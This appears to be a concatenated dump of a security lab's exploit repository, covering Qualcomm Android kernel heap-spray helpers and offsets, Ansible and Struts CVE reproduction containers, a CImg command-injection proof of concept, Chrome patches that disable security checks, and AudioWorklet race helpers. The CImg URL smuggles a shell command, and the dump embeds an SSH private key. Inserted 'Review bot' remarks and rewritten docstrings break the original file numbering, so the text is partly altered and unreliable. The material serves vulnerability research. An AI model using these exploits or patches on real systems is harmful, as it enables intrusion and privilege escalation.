((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
/* Clear every bit of the mask. */
#define CPU_ZERO(cpusetp) \
memset((cpusetp), 0, sizeof(cpu_set_t))
23 |
/* Pin the calling thread to CPU `i` through the raw sched_setaffinity
 * syscall, using a freshly zeroed cpu_set_t with only bit `i` set.
 * Returns 0 when the syscall succeeded and -1 when it reported an error. */
int migrate_to_cpu(int i)
{
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(i, &mask);

    pid_t self = gettid();
    int rc = syscall(__NR_sched_setaffinity, self, sizeof(mask), &mask);
    return rc == 0 ? 0 : -1;
}
39 |
/* Probe whether the thread can be pinned to CPU 4 and then CPU 5.
 * Returns the first CPU number whose migration failed, or -1 when both
 * succeeded. Note that on success the thread is left pinned to CPU 5. */
int check_cpu_affinity() {
    const int probe_cpus[] = {4, 5};
    const int count = (int)(sizeof(probe_cpus) / sizeof(probe_cpus[0]));
    for (int k = 0; k < count; k++) {
        if (migrate_to_cpu(probe_cpus[k]) == -1) {
            return probe_cpus[k];
        }
    }
    return -1;
}
45 |
46 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Qualcomm/CVE-2022-22057/cpu_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef CPU_UTILS
2 | #define CPU_UTILS
3 |
4 | int migrate_to_cpu(int i);
5 |
6 | int check_cpu_affinity();
7 | #endif
8 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Qualcomm/CVE-2022-22057/sendmsg_spray.h:
--------------------------------------------------------------------------------
1 | #ifndef SENDMSG_SPRAY_H
2 | #define SENDMSG_SPRAY_H
3 | #include
4 | #include
5 | #include
6 | #include
7 |
8 | #define MAX_SENDMSG_BATCH 6
9 |
/* Argument block for the reallocation worker threads managed by the helpers
 * declared below: init_reallocation(rta, nb_reallocs) takes an array of
 * these and cleanup(rta) releases them. How each field is used is not
 * visible from this header - confirm against the implementation. */
struct realloc_thread_arg
{
pthread_t tid;
int recv_fd;
int send_fd;
struct sockaddr_un addr;
char* realloc_data;
size_t object_size;
int spray_cpu;
int level;
int type;
int batch_num;
};
23 |
24 | int init_reallocation(struct realloc_thread_arg *rta, size_t nb_reallocs);
25 |
26 | void reset();
27 |
28 | void realloc_NOW(int);
29 |
30 | void cleanup(struct realloc_thread_arg* rta);
31 |
32 | #endif
33 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Qualcomm/CVE-2022-22057/signalfd_spray.h:
--------------------------------------------------------------------------------
1 | #ifndef SIGNALFD_SPRAY_H
2 | #define SIGNALFD_SPRAY_H
3 |
4 | #define CPU_RANGE 7
5 |
6 | void spray_signalfd(uint64_t* mask, int num, int cpu, int* fds);
7 |
8 | uint64_t read_signalfd_mask(int fd);
9 |
10 | void spray_with_intervals(uint64_t interval, int count, int exclude_cpu_mask, uint64_t* mask, int* fds, int spray_size);
11 |
12 | int search_changed_mask(uint64_t expected, int* fds, uint64_t fd_size, uint64_t* new_mask);
13 |
14 | void change_signalfd_mask(uint64_t* mask, int fd);
15 | #endif
16 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Qualcomm/CVE-2022-22057/work_queue_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef WORK_QUEUE_UTILS
2 | #define WORK_QUEUE_UTILS
3 |
4 | #include "fake_obj_util.h"
5 |
6 | #define SYSTEM_UNBOUND_WQ_OFF 0x2b8f7f8ul
7 |
8 | #define KGSL_DRIVER_OFF 0x2d0a000
9 |
10 | #define KGSL_MEMQUEUE_OFF (KGSL_DRIVER_OFF + 0x518)
11 |
12 | //worker_pool::worklist
13 | #define WORKLIST_OFF 0x20
14 |
15 | uint64_t get_wq_addr(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t wq_ptr_addr);
16 |
17 | uint64_t get_pwq_addr(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t wq_addr);
18 |
19 | uint64_t map_pwq(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t pwq_addr, uint64_t* pwq_region);
20 |
21 | uint64_t map_pwq_pool(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t pool_addr, uint64_t* pool_region);
22 |
23 | int queue_work(uint8_t* pool_region, uint64_t pool_addr, uint8_t* pwq_region, uint64_t pwq_addr, uint8_t* sub_info, uint64_t sub_info_vaddr, uint64_t worklist_addr);
24 |
25 | void setup_sub_info(uint8_t* sub_info, uint64_t sub_info_vaddr, uint64_t kernel_shift, uint64_t arg_vaddr, uint8_t* arg_region);
26 | #endif
27 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h:
--------------------------------------------------------------------------------
1 | #ifndef ADRENO_CMD_H
2 | #define ADRENO_CMD_H
3 |
4 | #include
5 |
6 | #define CP_TYPE4_PKT (4 << 28)
7 | #define CP_TYPE7_PKT (7 << 28)
8 |
9 | #define CP_NOP 0x10
10 | #define CP_WAIT_FOR_ME 0x13
11 | #define CP_WAIT_FOR_IDLE 0x26
12 | #define CP_WAIT_REG_MEM 0x3c
13 | #define CP_MEM_WRITE 0x3d
14 | #define CP_INDIRECT_BUFFER_PFE 0x3f
15 | #define CP_SET_DRAW_STATE 0x43
16 | #define CP_MEM_TO_MEM 0x73
17 | #define CP_SET_PROTECTED_MODE 0x5f
18 |
19 | #define upper_32_bits(n) ((uint32_t)(((n) >> 16) >> 16))
20 | #define lower_32_bits(n) ((uint32_t)(n))
21 |
22 | uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr);
23 |
24 | uint pm4_calc_odd_parity_bit(uint val);
25 |
26 | uint cp_type7_packet(uint opcode, uint cnt);
27 |
28 | uint cp_wait_for_me(uint *cmds);
29 |
30 | uint cp_mem_packet(int opcode, uint size, uint num_mem);
31 |
32 | uint cp_wait_for_idle(uint *cmds);
33 |
34 | uint cp_type4_packet(uint opcode, uint cnt);
35 |
36 | uint cp_register(unsigned int reg, unsigned int size);
37 |
38 | uint cp_invalidate_state(uint *cmds);
39 |
40 | #endif
41 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Qualcomm/NPU/sendmsg_spray.h:
--------------------------------------------------------------------------------
1 | #ifndef SENDMSG_SPRAY_H
2 | #define SENDMSG_SPRAY_H
3 | #include
4 | #include
5 | #include
6 | #include
7 |
/* Argument block for the reallocation worker threads managed by the helpers
 * declared below: init_reallocation(rta, nb_reallocs) takes an array of
 * these. How each field is used is not visible from this header - confirm
 * against the implementation. */
struct realloc_thread_arg
{
pthread_t tid;
int recv_fd;
int send_fd;
struct sockaddr_un addr;
char* realloc_data;
size_t object_size;
int cpu;
};
18 |
19 | void migrate_to_cpu(int i);
20 |
21 | int init_reallocation(struct realloc_thread_arg *rta, size_t nb_reallocs);
22 |
23 | void reset();
24 |
25 | void realloc_NOW(void);
26 |
27 | #endif
28 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/server/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:bionic
2 |
3 | RUN apt-get update && \
4 | apt-get install -y \
5 | ansible git curl zip unzip psmisc \
6 | tmux sudo emacs openssh-server net-tools \
7 | gcc
8 |
9 | # Create a user account named "bofh" (which will have sudo privileges).
10 | RUN adduser bofh --disabled-password
11 |
12 | # Grant the 'bofh' user sudo access (only so that we can start sshd).
13 | RUN adduser bofh sudo
14 | RUN echo "bofh:x" | chpasswd
15 | COPY home/ /home/bofh/
16 | RUN chown -R bofh:bofh /home/bofh
17 |
18 | # Switch over to the 'bofh' user, since root access is no longer required
19 | USER bofh
20 | WORKDIR /home/bofh
21 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/server/home/.ssh/authorized_keys:
--------------------------------------------------------------------------------
1 | ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMlKzkE3eZi8hNuNzp03Jz95dBu6621V8HstIJJgisT bofh@zeuss
2 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/server/home/scripts/bashrc:
--------------------------------------------------------------------------------
1 | cd /home/bofh/k/e/v/w/o/z/e/r/e
2 | export HOME=../../../../../../../../../home/bofh
3 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/server/home/scripts/enable_exploit.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | mkdir -p /home/bofh/k/e/v/w/o/z/e/r/e
3 | mkdir -p /home/bofh/home
4 | ln -s /home/bofh/ /home/bofh/home/bofh
5 | cd /home/bofh/scripts
6 | cp /home/bofh/scripts/bashrc /home/bofh/.bashrc
7 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/zeuss/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:bionic
2 |
3 | RUN apt-get update && \
4 | apt-get install -y \
5 | git curl zip unzip psmisc \
6 | tmux sudo emacs openssh-server net-tools x11-apps \
7 | build-essential libssl-dev libffi-dev python-dev \
8 | python-setuptools python-jinja2 python-yaml
9 |
10 | # Create a non-root user account to run Ansible.
11 | RUN adduser bofh --disabled-password
12 |
13 | # Grant the 'bofh' user sudo access, so that we can start sshd.
14 | RUN adduser bofh sudo
15 | RUN echo "bofh:x" | chpasswd
16 | COPY home/ /home/bofh/
17 | RUN chown -R bofh:bofh /home/bofh
18 |
19 | # Switch over to the 'bofh' user, since root access is no longer required
20 | USER bofh
21 | WORKDIR /home/bofh
22 |
23 | # Get vulnerable version of Ansible source code.
24 | RUN git clone https://github.com/ansible/ansible.git && \
25 | cd ansible && \
26 | git checkout f9f7b29a5a5543e8d1c25e8cc1f2d3040d8536b7
27 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/zeuss/home/.ssh/id_ed25519:
--------------------------------------------------------------------------------
1 | -----BEGIN OPENSSH PRIVATE KEY-----
2 | b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
3 | QyNTUxOQAAACDjJSs5BN3mYvITbjc6dNyc/eXQbuuttVfB7LSCSYIrEwAAAJDuQrmQ7kK5
4 | kAAAAAtzc2gtZWQyNTUxOQAAACDjJSs5BN3mYvITbjc6dNyc/eXQbuuttVfB7LSCSYIrEw
5 | AAAEATobJL9MLSQNtHem7bzn8zp7dLWqdqP5VQo3Ma61L9+eMlKzkE3eZi8hNuNzp03Jz9
6 | 5dBu6621V8HstIJJgisTAAAACmJvZmhAemV1c3MBAgM=
7 | -----END OPENSSH PRIVATE KEY-----
8 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/zeuss/home/.ssh/id_ed25519.pub:
--------------------------------------------------------------------------------
1 | ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMlKzkE3eZi8hNuNzp03Jz95dBu6621V8HstIJJgisT bofh@zeuss
2 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/zeuss/home/config/ansible.cfg:
--------------------------------------------------------------------------------
1 | [defaults]
2 | inventory = inventory.d
3 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/zeuss/home/config/inventory.d/inventory:
--------------------------------------------------------------------------------
1 | [servers]
2 | 172.16.0.10
3 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/zeuss/home/config/myfetch.yml:
--------------------------------------------------------------------------------
1 | ---
2 | - hosts: servers
3 | tasks:
4 | - name: Fetch authorized_keys
5 | fetch:
6 | src: ~/.ssh/authorized_keys
7 | dest: fetched
8 |
--------------------------------------------------------------------------------
/SecurityExploits/Apache/Struts/CVE-2018-11776/struts-attacker/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:bionic
2 |
3 | RUN apt-get update && \
4 | apt-get install -y curl tmux emacs net-tools gcc ssh build-essential
5 |
6 | # Create user account for the attacker.
7 | RUN adduser attacker --disabled-password
8 |
9 | # Copy the exploit PoC into the attacker's home directory.
10 | COPY src /home/attacker/src
11 | RUN chown -R attacker:attacker /home/attacker/src
12 |
13 | # Switch over to the 'attacker' user, since root access is no longer required
14 | USER attacker
15 | WORKDIR /home/attacker
16 | RUN cd src && make
17 |
18 | # Create an ssh key for the attacker.
19 | RUN ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -q -P ""
20 |
--------------------------------------------------------------------------------
/SecurityExploits/Apache/Struts/CVE-2018-11776/struts-attacker/src/Makefile:
--------------------------------------------------------------------------------
1 | all: copykey startcalc
2 |
3 | clean:
4 | rm -f *.o copykey startcalc
5 |
6 | copykey: copykey.o utils.o
7 | gcc -Wall copykey.o utils.o -o copykey
8 |
9 | startcalc: startcalc.o utils.o
10 | gcc -Wall startcalc.o utils.o -o startcalc
11 |
12 | copykey.o: copykey.c utils.h
13 | gcc -c copykey.c
14 |
15 | startcalc.o: startcalc.c utils.h
16 | gcc -c startcalc.c
17 |
18 | utils.o: utils.c utils.h
19 | gcc -c utils.c
20 |
--------------------------------------------------------------------------------
/SecurityExploits/Apache/Struts/CVE-2018-11776/struts-attacker/src/utils.h:
--------------------------------------------------------------------------------
1 | int escape_forward_slash(char* dst, size_t dstlen, const char* src);
2 | int urlencode(char* dst, size_t dstlen, const char* src);
3 |
--------------------------------------------------------------------------------
/SecurityExploits/Apache/Struts/CVE-2018-11776/struts-server/struts-actionchaining.xml:
--------------------------------------------------------------------------------
1 |
2 |
22 |
25 |
26 |
27 |
28 |
29 | register2
30 |
31 |
32 |
33 |
34 |
--------------------------------------------------------------------------------
/SecurityExploits/CImg/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:bionic
2 |
3 | RUN apt-get update && \
4 | apt-get install -y git gcc build-essential curl
5 |
6 | # Create user account for the attacker.
7 | RUN adduser semmle --disabled-password
8 |
9 | # Copy the exploit PoC into the user's home directory.
10 | COPY poc.c /home/semmle/poc.c
11 | RUN chown -R semmle:semmle /home/semmle/
12 |
13 | # Switch over to the 'semmle' user, since root access is no longer required
14 | USER semmle
15 | WORKDIR /home/semmle
16 | RUN git clone https://framagit.org/dtschump/CImg.git
17 | RUN cd CImg && git checkout 5bb8a03d7fed06275ddb53a56c567fb6f61aa4a4
18 |
--------------------------------------------------------------------------------
/SecurityExploits/CImg/README.md:
--------------------------------------------------------------------------------
1 | # Command injection in CImg
2 |
3 | This is a proof of concept for a command injection vulnerability in the [CImg](http://cimg.eu/) library. The vulnerability was found by [Cristian-Alexandru Staicu](https://www.linkedin.com/in/crstaicu/), during his internship at Semmle in 2018. We reported the vulnerability to David Tschumperle, maintainer of CImg, on Jul 27, 2018. The vulnerability was [fixed](https://github.com/dtschump/CImg/commit/5ce7a426b77f814973e56182a0e76a2b04904146) in version 2.3.4.
4 |
5 | The problem is that the `load_network` function does not do any sanitization on the url string. Internally, `load_network` calls `system`, which means that a specially crafted url can trigger code execution. Since CImg is a library, the severity of the issue depends greatly on how it is used. If anyone has written an application that calls `load_network` directly with a string that came from something like an HTTP request, then it would be a remote code execution vulnerability.
6 |
7 | To run the PoC, first build and run the docker image:
8 |
9 | ```bash
10 | docker build . -t cimg
11 | docker run -i -t cimg
12 | ```
13 |
14 | The Dockerfile clones the [CImg](https://framagit.org/dtschump/CImg.git) git repository and checks out the vulnerable version.
15 |
16 | Now, inside docker, compile and run the PoC as follows:
17 |
18 | ```bash
19 | g++ -I./CImg poc.c -o poc
20 | ./poc
21 | ```
22 |
23 | Notice that the file `~/CImg-RCE` has now been created.
24 |
--------------------------------------------------------------------------------
/SecurityExploits/CImg/poc.c:
--------------------------------------------------------------------------------
1 | #undef cimg_display
2 | #define cimg_display 0
3 | #include "CImg.h"
4 | using namespace cimg_library;
5 |
6 | // To compile and run:
7 | //
8 | // g++ -I./CImg poc.c -o poc
9 | // ./poc
10 | //
11 | // Notice that the file ~/CImg-RCE has now been created.
12 |
// Entry point of the PoC. It demonstrates the command injection described in
// README.md: assigning a URL string to a CImg presumably routes it through
// load_network, which hands the string to system() without sanitizing it, so
// running this creates ~/CImg-RCE as the comment above notes. The issue was
// fixed upstream in CImg 2.3.4. argc and argv are unused.
int main(int argc, char **argv) {
const char *str = "https://i.pinimg.com/originals/da/25/51/da2551d47b8ae00fa7beb583bff53236.jpg\" && touch ~/CImg-RCE && echo \"";
CImg<> img;
img.assign(str);

return 0;
}
20 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/CVE-2021-30528/aarch64/browser.patch:
--------------------------------------------------------------------------------
1 | diff --git a/components/autofill/core/browser/autofill_manager.cc b/components/autofill/core/browser/autofill_manager.cc
2 | index 07b62e25c1ff..d5496277f632 100644
3 | --- a/components/autofill/core/browser/autofill_manager.cc
4 | +++ b/components/autofill/core/browser/autofill_manager.cc
5 | @@ -2542,7 +2542,9 @@ void AutofillManager::GetAvailableSuggestions(
6 | return;
7 | }
8 |
9 | - context->is_context_secure = !IsFormNonSecure(form);
10 | +// context->is_context_secure = !IsFormNonSecure(form);
11 | + context->is_context_secure = true;
12 | +
13 |
14 | // TODO(rogerm): Early exit here on !driver()->RendererIsAvailable()?
15 | // We skip populating autofill data, but might generate warnings and or
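Review bot: The hunk keeps the replaced assignment as a `//` comment and also adds an empty `+` line after the new one, both of which are noise that is re-applied every time this patch is used; drop the commented-out line and the trailing blank line, and state the reason on the surviving assignment instead, e.g. `context->is_context_secure = true;  // local reproduction build: forced on`. GetAvailableSuggestions's body continues outside the hunk.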
16 | diff --git a/components/autofill/core/browser/payments/credit_card_access_manager.cc b/components/autofill/core/browser/payments/credit_card_access_manager.cc
17 | index 560f30b57c88..6b5715949ffd 100644
18 | --- a/components/autofill/core/browser/payments/credit_card_access_manager.cc
19 | +++ b/components/autofill/core/browser/payments/credit_card_access_manager.cc
20 | @@ -163,7 +163,7 @@ void CreditCardAccessManager::PrepareToFetchCreditCard() {
21 | #if !defined(OS_IOS)
22 | // No need to fetch details if there are no server cards.
23 | if (!ServerCardsAvailable())
24 | - return;
25 | +// return;
26 |
27 | // Do not make an unnecessary preflight call unless signaled.
28 | if (!can_fetch_unmask_details_.IsSignaled())
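Review bot: Commenting out `return;` leaves `if (!ServerCardsAvailable())` with no statement of its own, so the next statement — `if (!can_fetch_unmask_details_.IsSignaled())`, whose body lies outside the hunk — silently becomes its body, and the early exit is replaced by a different conditional rather than removed. If the check is meant to go away, comment out the `if` line as well; if it should stay for readability, give it an explicit empty body: `if (!ServerCardsAvailable()) { /* no early return in this build */ }`. The identical hunk appears in arm/browser.patch below. PrepareToFetchCreditCard's body continues outside the hunk.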
29 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/CVE-2021-30528/aarch64/trigger.html:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/CVE-2021-30528/arm/browser.patch:
--------------------------------------------------------------------------------
1 | diff --git a/components/autofill/core/browser/autofill_manager.cc b/components/autofill/core/browser/autofill_manager.cc
2 | index 07b62e25c1ff..d5496277f632 100644
3 | --- a/components/autofill/core/browser/autofill_manager.cc
4 | +++ b/components/autofill/core/browser/autofill_manager.cc
5 | @@ -2542,7 +2542,9 @@ void AutofillManager::GetAvailableSuggestions(
6 | return;
7 | }
8 |
9 | - context->is_context_secure = !IsFormNonSecure(form);
10 | +// context->is_context_secure = !IsFormNonSecure(form);
11 | + context->is_context_secure = true;
12 | +
13 |
14 | // TODO(rogerm): Early exit here on !driver()->RendererIsAvailable()?
15 | // We skip populating autofill data, but might generate warnings and or
16 | diff --git a/components/autofill/core/browser/payments/credit_card_access_manager.cc b/components/autofill/core/browser/payments/credit_card_access_manager.cc
17 | index 560f30b57c88..6b5715949ffd 100644
18 | --- a/components/autofill/core/browser/payments/credit_card_access_manager.cc
19 | +++ b/components/autofill/core/browser/payments/credit_card_access_manager.cc
20 | @@ -163,7 +163,7 @@ void CreditCardAccessManager::PrepareToFetchCreditCard() {
21 | #if !defined(OS_IOS)
22 | // No need to fetch details if there are no server cards.
23 | if (!ServerCardsAvailable())
24 | - return;
25 | +// return;
26 |
27 | // Do not make an unnecessary preflight call unless signaled.
28 | if (!can_fetch_unmask_details_.IsSignaled())
29 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/CVE-2021-30528/arm/trigger.html:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/CVE-2021-30528/copy_mojo_js_bindings.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/python
2 |
3 | import os
4 | import shutil
5 | import sys
6 |
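def copy_mojo_js_bindings(base_path, target_root='./'):
    """Collect the generated Mojo JS bindings found below ``base_path``.

    Walks ``base_path`` recursively and copies:

    * every ``mojo_bindings.js`` into ``target_root`` itself, and
    * every ``*.mojom.js`` into ``target_root`` at the same relative path
      it had below ``base_path``, creating directories as needed.

    Args:
        base_path: directory tree to search.
        target_root: destination directory. Defaults to the current
            directory, which is what the command-line form always used.

    Returns:
        The number of files copied.

    Raises:
        OSError: if a destination directory cannot be created for any
            reason other than already existing, or if a copy fails. Only
            "already exists" is ignored; permission problems and the like
            are no longer swallowed silently.
    """
    copied = 0
    for path, _dirs, files in os.walk(base_path):
        for name in files:
            if name == 'mojo_bindings.js':
                shutil.copyfile(os.path.join(path, name),
                                os.path.join(target_root, name))
                copied += 1

            if name.endswith('.mojom.js'):
                # relpath also copes with a trailing slash on base_path,
                # which fixed-offset slicing of the walked path does not.
                rel_dir = os.path.relpath(path, base_path)
                target_path = os.path.join(target_root, rel_dir)
                try:
                    os.makedirs(target_path)
                except OSError:
                    # Re-running over an existing tree is fine; anything
                    # else (permissions, a file in the way) must surface.
                    if not os.path.isdir(target_path):
                        raise
                shutil.copyfile(os.path.join(path, name),
                                os.path.join(target_path, name))
                copied += 1
    return copied


if __name__ == '__main__':
    if len(sys.argv) != 2:
        sys.stderr.write('usage: %s <directory-to-search>\n' % sys.argv[0])
        sys.exit(2)
    copy_mojo_js_bindings(sys.argv[1])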
20 |
21 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/GHSL-2020-165/copy_mojo_js_bindings.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/python
2 |
3 | import os
4 | import shutil
5 | import sys
6 |
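def copy_mojo_js_bindings(base_path, target_root='./'):
    """Collect the generated Mojo JS bindings found below ``base_path``.

    Walks ``base_path`` recursively and copies:

    * every ``mojo_bindings.js`` into ``target_root`` itself, and
    * every ``*.mojom.js`` into ``target_root`` at the same relative path
      it had below ``base_path``, creating directories as needed.

    Args:
        base_path: directory tree to search.
        target_root: destination directory. Defaults to the current
            directory, which is what the command-line form always used.

    Returns:
        The number of files copied.

    Raises:
        OSError: if a destination directory cannot be created for any
            reason other than already existing, or if a copy fails. Only
            "already exists" is ignored; permission problems and the like
            are no longer swallowed silently.
    """
    copied = 0
    for path, _dirs, files in os.walk(base_path):
        for name in files:
            if name == 'mojo_bindings.js':
                shutil.copyfile(os.path.join(path, name),
                                os.path.join(target_root, name))
                copied += 1

            if name.endswith('.mojom.js'):
                # relpath also copes with a trailing slash on base_path,
                # which fixed-offset slicing of the walked path does not.
                rel_dir = os.path.relpath(path, base_path)
                target_path = os.path.join(target_root, rel_dir)
                try:
                    os.makedirs(target_path)
                except OSError:
                    # Re-running over an existing tree is fine; anything
                    # else (permissions, a file in the way) must surface.
                    if not os.path.isdir(target_path):
                        raise
                shutil.copyfile(os.path.join(path, name),
                                os.path.join(target_path, name))
                copied += 1
    return copied


if __name__ == '__main__':
    if len(sys.argv) != 2:
        sys.stderr.write('usage: %s <directory-to-search>\n' % sys.argv[0])
        sys.exit(2)
    copy_mojo_js_bindings(sys.argv[1])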
20 |
21 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/GHSL-2020-165/payment_request_clip2.html:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/GHSL-2020-165/payment_request_jam_clip.html:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/GHSL-2020-165/sbx.patch:
--------------------------------------------------------------------------------
1 | diff --git a/third_party/blink/renderer/modules/payments/payment_request.cc b/third_party/blink/renderer/modules/payments/payment_request.cc
2 | index b0975c59ddb5..a2d7c273950c 100644
3 | --- a/third_party/blink/renderer/modules/payments/payment_request.cc
4 | +++ b/third_party/blink/renderer/modules/payments/payment_request.cc
5 | @@ -439,9 +439,9 @@ void StringifyAndParseMethodSpecificData(ExecutionContext& execution_context,
6 | if (supported_method == "basic-card") {
7 | BasicCardHelper::ParseBasiccardData(input, output->supported_networks,
8 | exception_state);
9 | - } else if (supported_method == kSecurePaymentConfirmationMethod &&
10 | + } else if (supported_method == kSecurePaymentConfirmationMethod/* &&
11 | RuntimeEnabledFeatures::SecurePaymentConfirmationEnabled(
12 | - &execution_context)) {
13 | + &execution_context)*/) {
14 | UseCounter::Count(&execution_context,
15 | WebFeature::kSecurePaymentConfirmation);
16 | output->secure_payment_confirmation =
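Review bot: Opening a `/*` mid-line after the method comparison and closing it mid-line two lines later leaves a condition that reads as two operands but compiles as one, which is easy to misread on the next rebase. Deleting the `&&` together with the two RuntimeEnabledFeatures lines, `} else if (supported_method == kSecurePaymentConfirmationMethod) {`, says the same thing without the hidden comment, and a one-line comment above it stating that the feature check is skipped in this build would record why. StringifyAndParseMethodSpecificData's body continues outside the hunk.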
17 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/blink/CVE-2020-15972/out2.mp3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/SecurityExploits/Chrome/blink/CVE-2020-15972/out2.mp3
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/blink/CVE-2020-15972/tear-down.js:
--------------------------------------------------------------------------------
1 | // white-noise-processor.js
/**
 * Block the calling thread for roughly `miliseconds` ms by busy-waiting on
 * the wall clock. There is deliberately no yielding: the loop only exits once
 * the clock has moved strictly past the deadline, so it always waits at
 * least `miliseconds` + 1 ms.
 *
 * @param {number} miliseconds how long to spin (note: original spelling kept)
 * @returns {undefined}
 */
function sleep(miliseconds) {
  const deadline = new Date().getTime() + miliseconds;
  while (new Date().getTime() <= deadline) {
    // spin
  }
}
7 |
class AutoProcessor extends AudioWorkletProcessor {
  /**
   * Render callback: busy-waits for five seconds (see sleep()) on every
   * invocation and then reports that the processor should be kept alive.
   *
   * @returns {boolean} always true
   */
  process(inputs, outputs, parameters) {
    const keepAlive = true;
    sleep(5000);
    return keepAlive;
  }
}
14 |
// Publish the processor under the name 'tear-down' (presumably the name the
// page-side AudioWorkletNode is created with).
registerProcessor('tear-down', AutoProcessor);
16 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/blink/CVE-2020-15972/tear_down2.html:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/blink/CVE-2020-15972/tear_down2_virtual.html:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/blink/CVE-2020-6449/delay-processor.js:
--------------------------------------------------------------------------------
1 | // white-noise-processor.js
/**
 * Block the calling thread for roughly `miliseconds` ms by busy-waiting on
 * the wall clock. No yielding: the loop only exits once the clock has moved
 * strictly past the deadline, so it waits at least `miliseconds` + 1 ms.
 *
 * @param {number} miliseconds how long to spin (original spelling kept)
 * @returns {undefined}
 */
function sleep(miliseconds) {
  const deadline = new Date().getTime() + miliseconds;
  while (new Date().getTime() <= deadline) {
    // spin
  }
}
7 |
class DelayProcessor extends AudioWorkletProcessor {
  /**
   * Render callback: busy-waits for two milliseconds (see sleep()) on every
   * invocation and then reports that the processor should be kept alive.
   *
   * @returns {boolean} always true
   */
  process(inputs, outputs, parameters) {
    const keepAlive = true;
    sleep(2);
    return keepAlive;
  }
}
14 |
// Publish the processor under the name 'delay-processor' (presumably the
// name the page-side AudioWorkletNode is created with).
registerProcessor('delay-processor', DelayProcessor);
16 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/blink/CVE-2020-6449/finished_delay_release2.html:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/blink/CVE-2020-6449/test-processor.js:
--------------------------------------------------------------------------------
1 | // white-noise-processor.js
/**
 * Block the calling thread for roughly `miliseconds` ms by busy-waiting on
 * the wall clock. No yielding: the loop only exits once the clock has moved
 * strictly past the deadline, so it waits at least `miliseconds` + 1 ms.
 *
 * @param {number} miliseconds how long to spin (original spelling kept)
 * @returns {undefined}
 */
function sleep(miliseconds) {
  const deadline = new Date().getTime() + miliseconds;
  while (new Date().getTime() <= deadline) {
    // spin
  }
}
7 |
class TestProcessor extends AudioWorkletProcessor {
  /**
   * Render callback: busy-waits for two milliseconds (see sleep()) on every
   * invocation and then reports that the processor should be kept alive.
   *
   * @returns {boolean} always true
   */
  process(inputs, outputs, parameters) {
    const keepAlive = true;
    sleep(2);
    return keepAlive;
  }
}
14 |
// Publish the processor under the name 'test-processor' (presumably the
// name the page-side AudioWorkletNode is created with).
registerProcessor('test-processor', TestProcessor);
16 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/blink/CVE-2020-6449/test-processor2.js:
--------------------------------------------------------------------------------
1 | // white-noise-processor.js
/**
 * Block the calling thread for roughly `miliseconds` ms by busy-waiting on
 * the wall clock. No yielding: the loop only exits once the clock has moved
 * strictly past the deadline, so it waits at least `miliseconds` + 1 ms.
 *
